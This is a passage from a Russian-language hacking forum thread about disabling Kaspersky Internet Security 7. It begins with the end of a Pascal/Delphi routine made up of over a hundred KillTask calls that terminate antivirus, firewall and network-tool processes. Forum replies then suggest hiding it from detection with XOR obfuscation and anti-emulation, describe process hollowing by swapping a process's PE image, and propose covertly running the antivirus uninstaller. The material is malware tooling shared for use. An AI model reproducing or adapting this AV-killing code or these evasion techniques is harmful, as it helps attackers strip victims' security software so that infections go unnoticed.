KillTask('VET32.EXE');
KillTask('VET32.exe');
KillTask('VET95.EXE');
KillTask('VETTRAY.EXE');
KillTask('VFSETUP.EXE');
KillTask('VIR-HELP.EXE');
KillTask('VIRUSMDPERSONALFIREWALL.EXE');
KillTask('VNLAN300.EXE');
KillTask('VNPC3000.EXE');
KillTask('VPC32.EXE');
KillTask('VPC42.EXE');
KillTask('VPFW30S.EXE');
KillTask('VPTRAY.EXE');
KillTask('VSCENU6.02D30.EXE');
KillTask('VSCHED.EXE');
KillTask('VSECOMR.EXE');
KillTask('VSHWIN32.EXE');
KillTask('VSISETUP.EXE');
KillTask('VSMAIN.EXE');
KillTask('VSMON.EXE');
KillTask('VSSTAT.EXE');
KillTask('VSWIN9XE.EXE');
KillTask('VSWINNTSE.EXE');
KillTask('VSWINPERSE.EXE');
KillTask('VVSTAT.EXE');
KillTask('VbCons.exe');
KillTask('Vet95.exe');
KillTask('VetTray.exe');
KillTask('W32DSM89.EXE');
KillTask('W9X.EXE');
KillTask('WATCHDOG.EXE');
KillTask('WEBSCANX.EXE');
KillTask('WEBTRAP.EXE');
KillTask('WGFE95.EXE');
KillTask('WHOSWATCHINGME.EXE');
KillTask('WIMMUN32.EXE');
KillTask('WINRECON.EXE');
KillTask('WINROUTE');
KillTask('WINSFCM.EXE');
KillTask('WNT.EXE');
KillTask('WRADMIN.EXE');
KillTask('WRCTRL.EXE');
KillTask('WSBGATE.EXE');
KillTask('WYVERNWORKSFIREWALL.EXE');
KillTask('WrAdmin.exe');
KillTask('WrCtrl.exe');
KillTask('XPF202EN.EXE');
KillTask('ZAPRO.EXE');
KillTask('ZAPSETUP3001.EXE');
KillTask('ZATUTOR.EXE');
KillTask('ZAUINST.EXE');
KillTask('ZONALM2601.EXE');
KillTask('ZONEALARM.EXE');
KillTask('_AVP32.EXE');
KillTask('_AVPCC.EXE');
KillTask('_AVPM.EXE');
KillTask('agentw.exe');
KillTask('alogserv.exe');
KillTask('apvxdwin.exe');
KillTask('avkpop.exe');
KillTask('avkservice.exe');
KillTask('avkwctl9.exe');
KillTask('avpm.exe');
KillTask('blackd.exe');
KillTask('ccApp.exe');
KillTask('ccEvtMgr.exe');
KillTask('ccPxySvc.exe');
KillTask('cfgWiz.exe');
KillTask('cleaner.EXE');
KillTask('cleaner3.EXE');
KillTask('cpd.exe');
KillTask('defalert.exe');
KillTask('defscangui.exe');
KillTask('f-stopw.exe');
KillTask('fameh32.exe');
KillTask('fch32.exe');
KillTask('fih32.exe');
KillTask('fnrb32.exe');
KillTask('fsaa.exe');
KillTask('fsav32.exe');
KillTask('fsgk32.exe');
KillTask('fsm32.exe');
KillTask('fsma32.exe');
KillTask('fsmb32.exe');
KillTask('gbmenu.exe');
KillTask('gbpoll.exe');
KillTask('iamapp.exe');
KillTask('iamserv.exe');
KillTask('lockdown2000.exe');
KillTask('navapsvc');
KillTask('navapsvc.exe');
KillTask('netstat.exe');
KillTask('notstart.exe');
KillTask('npscheck.exe');
KillTask('ntrtscan.EXE');
KillTask('nvapsvc');
KillTask('pathping.exe');
KillTask('pavproxy.exe');
KillTask('pccntmon.EXE');
KillTask('pccwin97.EXE');
KillTask('pcscan.EXE');
KillTask('ping.exe');
KillTask('rapapp.exe');
KillTask('route.exe');
KillTask('routemon.exe');
KillTask('sbserv.exe');
KillTask('sharedaccess');
KillTask('tracerpt.exe');
KillTask('tracert.exe');
KillTask('vbcmserv.exe');
KillTask('vsmon.exe');
KillTask('zapro.exe');
KillTask('zonealarm.exe');
end.
Пробуем :)
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-28 20:43:52.610000
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
Flier, твоя программа делает это? quote:
Создать поток в своём процессе -> из него приостановить себя -> заменить свой PE-имидж нужным (да-да, читать PE-заголовок и раскладывать всё по местам ручками) -> запустить себя, что, собственно, и реализует приведённый выше пример
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-29 20:06:28.863333
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
FLIER: 1) каспера она не вырубет в любом случае :) 2) эти имена АВ палятся самими АВ !!! так что не катит!
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-29 20:59:45.963333
|
|
|
Sunzer
Сообщений: 253
Оценки: 31190
Присоединился: 2007-06-15 19:23:32.436666
|
quote:
ORIGINAL: VaZoNeZ FLIER: 1) каспера она не вырубет в любом случае :) 2) эти имена АВ палятся самими АВ !!! так что не катит! Да ладно, поксорь и антиэмуляцию поставь )
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-29 21:03:39.856666
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
но это не изменит того, что "это" нифига с каспером не сделает…
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-29 21:07:40.890000
|
|
|
Sunzer
Сообщений: 253
Оценки: 31190
Присоединился: 2007-06-15 19:23:32.436666
|
Ну да.. Есть еще такая фишка с запуском деинсталятора… Как то баловался вроде получалось…
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-29 21:11:39.670000
|
|
|
VaZoNeZ
Сообщений: -6758
Оценки: 0
Присоединился: 2008-10-31 14:38:43.796666
|
гы… может выйти! но думаю ТС`у надо незаметность, а не снос нахрен каспера…
|
|
|
RE: Отключение защиты KIS 7 - 2008-11-29 21:29:07.036666
|
|
|
Unconnected
Сообщений: 158
Оценки: 0
Присоединился: 2008-09-11 22:02:01.983333
|
quote:
гы… может выйти! но думаю ТС`у надо незаметность, а не снос нахрен каспера… Гы,в душе я жутко брутален))) Если незаметно снести - то почему бы и нет!
|
|
|
|
|